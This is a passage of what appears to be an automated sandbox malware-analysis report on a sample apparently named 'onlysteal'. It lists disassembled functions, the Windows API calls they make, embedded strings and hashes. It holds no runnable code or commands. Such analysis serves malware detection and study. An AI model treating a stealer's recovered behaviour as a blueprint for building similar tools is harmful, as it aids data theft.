                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E580
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 616cbce7f8b1a93ce2b97511779f4d743dce6e8b0c0420210d55aa7c63625a39
                                      • Instruction ID: 653e8a77354c10f8cf140d45be82d162ead9a1ae6475ca9d2c04e7d33dee5713
                                      • Opcode Fuzzy Hash: 616cbce7f8b1a93ce2b97511779f4d743dce6e8b0c0420210d55aa7c63625a39
                                      • Instruction Fuzzy Hash: F9A011C22BE002BC3A0C33A0AC03C3B020EE0C2B203328A2EF80280080A88008B00C30
                                      Function 0024E58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E580
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 95651d3367890245b79c9bae9c2e783175a6005238ae823d53e5f8411f2e306a
                                      • Instruction ID: 653e8a77354c10f8cf140d45be82d162ead9a1ae6475ca9d2c04e7d33dee5713
                                      • Opcode Fuzzy Hash: 95651d3367890245b79c9bae9c2e783175a6005238ae823d53e5f8411f2e306a
                                      • Instruction Fuzzy Hash: F9A011C22BE002BC3A0C33A0AC03C3B020EE0C2B203328A2EF80280080A88008B00C30
                                      Function 0024AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetCurrentDirectoryW.KERNELBASE(?,0024AE72,C:\Users\user\Desktop,00000000,0027946A,00000006), ref: 0024AC08
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory
                                      • String ID:
                                      • API String ID: 1611563598-0
                                      • Opcode ID: 0792a87bd794366217ebe45f1f62fd2ecdc790f0a9b504abaa3862f2cf634720
                                      • Instruction ID: 92ba33814cb184874632f3c2f2c6b7806e714a24df9120adeea117e99857c56d
                                      • Opcode Fuzzy Hash: 0792a87bd794366217ebe45f1f62fd2ecdc790f0a9b504abaa3862f2cf634720
                                      • Instruction Fuzzy Hash: 08A011302002008BAA008B32AF0AA0EBAAAAFA2B00F00C028A00880030CB30C820AA00
                                      Function 00239620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                      Download Yara Rule
                                      APIs
                                      • CloseHandle.KERNELBASE(000000FF,?,?,002395D6,?,?,?,?,?,00262641,000000FF), ref: 0023963B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID:
                                      • API String ID: 2962429428-0
                                      • Opcode ID: 0bb71cb4bdbdc769b4e3eff62b8384383ff7eb5e668670dbec05960d115c79ea
                                      • Instruction ID: 6580028ee19354f6757bba35015487cd60cc84b40a3d64d91d6454a4452cda18
                                      • Opcode Fuzzy Hash: 0bb71cb4bdbdc769b4e3eff62b8384383ff7eb5e668670dbec05960d115c79ea
                                      • Instruction Fuzzy Hash: F1F0E9B01A2B069FDB308E24C84A792B7EC6B13321F044B1ED0E6429E0D3B069ED8E40

                                      Non-executed Functions

                                      Function 0024C220 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 286timewindowfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00231316: GetDlgItem.USER32(00000000,00003021), ref: 0023135A
                                        • Part of subcall function 00231316: SetWindowTextW.USER32(00000000,002635F4), ref: 00231370
                                      • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0024C2B1
                                      • EndDialog.USER32(?,00000006), ref: 0024C2C4
                                      • GetDlgItem.USER32(?,0000006C), ref: 0024C2E0
                                      • SetFocus.USER32(00000000), ref: 0024C2E7
                                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 0024C321
                                      • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0024C358
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0024C36E
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0024C38C
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0024C39C
                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0024C3B8
                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0024C3D4
                                      • _swprintf.LIBCMT ref: 0024C404
                                        • Part of subcall function 00234092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002340A5
                                      • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0024C417
                                      • FindClose.KERNEL32(00000000), ref: 0024C41E
                                      • _swprintf.LIBCMT ref: 0024C477
                                      • SetDlgItemTextW.USER32(?,00000068,?), ref: 0024C48A
                                      • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0024C4A7
                                      • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0024C4C7
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0024C4D7
                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0024C4F1
                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0024C509
                                      • _swprintf.LIBCMT ref: 0024C535
                                      • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0024C548
                                      • _swprintf.LIBCMT ref: 0024C59C
                                      • SetDlgItemTextW.USER32(?,00000069,?), ref: 0024C5AF
                                        • Part of subcall function 0024AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0024AF35
                                        • Part of subcall function 0024AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0026E72C,?,?), ref: 0024AF84
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                      • String ID: %s %s$%s %s %s$P$$REPLACEFILEDLG
                                      • API String ID: 797121971-3943368862
                                      • Opcode ID: 7fab5854c8ff30581bbf45d8370ac8374ed8cc09210877f9ffc61c22ef545ef0
                                      • Instruction ID: ed036708e9413f32d97668335f7aee7740e843dcc5814df8ee60242bad98079c
                                      • Opcode Fuzzy Hash: 7fab5854c8ff30581bbf45d8370ac8374ed8cc09210877f9ffc61c22ef545ef0
                                      • Instruction Fuzzy Hash: 7991C8B2258345BFD265DBA4DC4DFFB77ACEB4A700F00481AF649D2091D7B1E6148B62
                                      Function 00236FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00236FAA
                                      • _wcslen.LIBCMT ref: 00237013
                                      • _wcslen.LIBCMT ref: 00237084
                                        • Part of subcall function 00237A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00237AAB
                                        • Part of subcall function 00237A9C: GetLastError.KERNEL32 ref: 00237AF1
                                        • Part of subcall function 00237A9C: CloseHandle.KERNEL32(?), ref: 00237B00
                                        • Part of subcall function 0023A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0023977F,?,?,002395CF,?,?,?,?,?,00262641,000000FF), ref: 0023A1F1
                                        • Part of subcall function 0023A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0023977F,?,?,002395CF,?,?,?,?,?,00262641), ref: 0023A21F
                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00237139
                                      • CloseHandle.KERNEL32(00000000), ref: 00237155
                                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00237298
                                        • Part of subcall function 00239DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,002373BC,?,?,?,00000000), ref: 00239DBC
                                        • Part of subcall function 00239DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00239E70
                                        • Part of subcall function 00239620: CloseHandle.KERNELBASE(000000FF,?,?,002395D6,?,?,?,?,?,00262641,000000FF), ref: 0023963B
                                        • Part of subcall function 0023A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0023A325,?,?,?,0023A175,?,00000001,00000000,?,?), ref: 0023A501
                                        • Part of subcall function 0023A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0023A325,?,?,?,0023A175,?,00000001,00000000,?,?), ref: 0023A532
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                      • API String ID: 3983180755-3508440684
                                      • Opcode ID: 2ec4cccc7dabb75cc0a233d260d6c048da6c298b451599eb14ad1cde6b0bcacc
                                      • Instruction ID: 425b8a4f0216ac817fd213f4ebcef9807ce1f9decd6a721652917cdf1cb74bf0
                                      • Opcode Fuzzy Hash: 2ec4cccc7dabb75cc0a233d260d6c048da6c298b451599eb14ad1cde6b0bcacc
                                      • Instruction Fuzzy Hash: EAC1B7F1924649AADF35DF74DC45FEEB3A8AF04300F00455AF95AE3182D770AA688F61
                                      Function 0025D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: __floor_pentium4
                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                      • API String ID: 4168288129-2761157908
                                      • Opcode ID: 4451ab058158e12e09782c6b10624cd1a588ab6aed4283215d60d856ae6756fa
                                      • Instruction ID: a8fc8624c99bd9f809eda40bd0717e53dda740355906953a60def0570f7ebaa4
                                      • Opcode Fuzzy Hash: 4451ab058158e12e09782c6b10624cd1a588ab6aed4283215d60d856ae6756fa
                                      • Instruction Fuzzy Hash: D9C26B71E282298FDF29CE28DD407E9B3B5EB44306F1541EAD84DE7240E774AE998F44
                                      Function 002332F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: H_prolog_swprintf
                                      • String ID: CMT$h%u$hc%u
                                      • API String ID: 146138363-3282847064
                                      • Opcode ID: 69a8f14b39ddaec49ace9f1c0e2f68ab5e50020d0b5cec2f05b5a5131bd3abe3
                                      • Instruction ID: 39d3d2c2d5497b801e8cfaac00dbb410372c4d8aa58e8b7d98330fd5283d45be
                                      • Opcode Fuzzy Hash: 69a8f14b39ddaec49ace9f1c0e2f68ab5e50020d0b5cec2f05b5a5131bd3abe3
                                      • Instruction Fuzzy Hash: CE32E6B15243859FDF18DF74C896AE937A5AF15300F04447EFD8A9B282DB709A59CB20
                                      Function 0023286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00232874
                                      • _strlen.LIBCMT ref: 00232E3F
                                        • Part of subcall function 002402BA: __EH_prolog.LIBCMT ref: 002402BF
                                        • Part of subcall function 00241B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0023BAE9,00000000,?,?,?,00010438), ref: 00241BA0
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00232F91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                      • String ID: CMT
                                      • API String ID: 1206968400-2756464174
                                      • Opcode ID: 95d7d7f0ae8389ac68671b6335608815f06af00feec35f3a7cb80dfce83056d9
                                      • Instruction ID: 5cf77bcff41f3de4ebd97018e945d74c2b693d12087b45151ada64cb8397cba1
                                      • Opcode Fuzzy Hash: 95d7d7f0ae8389ac68671b6335608815f06af00feec35f3a7cb80dfce83056d9
                                      • Instruction Fuzzy Hash: BA6228B1520345CFDB19CF34C8867EA7BA1EF54300F18447EEC9A9B282DB759969CB60
                                      Function 0024F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                      Download Yara Rule
                                      APIs
                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0024F844
                                      • IsDebuggerPresent.KERNEL32 ref: 0024F910
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0024F930
                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0024F93A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                      • String ID:
                                      • API String ID: 254469556-0
                                      • Opcode ID: 3da1e9d651a32ee8110bf5854ba91a37eb7def80bef3e2ac601a0c29ce7ec0b1
                                      • Instruction ID: 44c67f0fbc8c47847ae241ce19ab0b81376eccd18a33cecff7ba41945754a3d1
                                      • Opcode Fuzzy Hash: 3da1e9d651a32ee8110bf5854ba91a37eb7def80bef3e2ac601a0c29ce7ec0b1
                                      • Instruction Fuzzy Hash: E5312975D15219DBDB60DFA4D9897CCBBB8AF08304F1040EAE50DAB250EB759B849F44
                                      Function 0024E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • VirtualQuery.KERNEL32(80000000,0024E5E8,0000001C,0024E7DD,00000000,?,?,?,?,?,?,?,0024E5E8,00000004,00291CEC,0024E86D), ref: 0024E6B4
                                      • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0024E5E8,00000004,00291CEC,0024E86D), ref: 0024E6CF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: InfoQuerySystemVirtual
                                      • String ID: D
                                      • API String ID: 401686933-2746444292
                                      • Opcode ID: 6b1e310915e2085cbcc81a9d25e37f7ffbb984ff258c1390116f3bae071ede44
                                      • Instruction ID: 0b0974d21e7a4b196da9766c231adcf518ea92222e77c31fefbfe28b09aabb1e
                                      • Opcode Fuzzy Hash: 6b1e310915e2085cbcc81a9d25e37f7ffbb984ff258c1390116f3bae071ede44
                                      • Instruction Fuzzy Hash: 47012B3261010A6BDF18DE29DC09BED7BAAFFC4338F0DC120ED19D7150D634D9158A80
                                      Function 00258EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00258FB5
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00258FBF
                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00258FCC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                      • String ID:
                                      • API String ID: 3906539128-0
                                      • Opcode ID: 6c5b842b4f2160ec2dee65a1f6ff0b61171067513308114b299cd7d8e5a38f3f
                                      • Instruction ID: 55c6fe85be99dd7a3305d2d4aacd3082504208d9d3617a02c6da1697c902be8e
                                      • Opcode Fuzzy Hash: 6c5b842b4f2160ec2dee65a1f6ff0b61171067513308114b299cd7d8e5a38f3f
                                      • Instruction Fuzzy Hash: 5331067591122DABCB61DF24DD88B8CBBB8BF08310F5041EAE81CA7250EB709F958F44
                                      Function 0025B348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .
                                      • API String ID: 0-248832578
                                      • Opcode ID: bda4c409741eee712368f1812e5943c5dea27a3364b09aa05fd8e979e88b3909
                                      • Instruction ID: 98c90f0a1fe4d3d4daacea27edf927258f21ea25004b4e6c4774a0c43b64bbce
                                      • Opcode Fuzzy Hash: bda4c409741eee712368f1812e5943c5dea27a3364b09aa05fd8e979e88b3909
                                      • Instruction Fuzzy Hash: EB31357182024AAFCB258E78CC84EFB7BBDDB85305F0441A8FC1997252E7309E588B50
                                      Function 0025D440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                      • Instruction ID: a02e5fc53e4987147b0033a914c06f6b9ee5c83e7d79cea1bcde66dc40afa82c
                                      • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                      • Instruction Fuzzy Hash: 13023C71E112199BDF24CFA9C8806ADF7F5EF88315F258169D819EB380D730AD55CB84
                                      Function 0024AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                      Download Yara Rule
                                      APIs
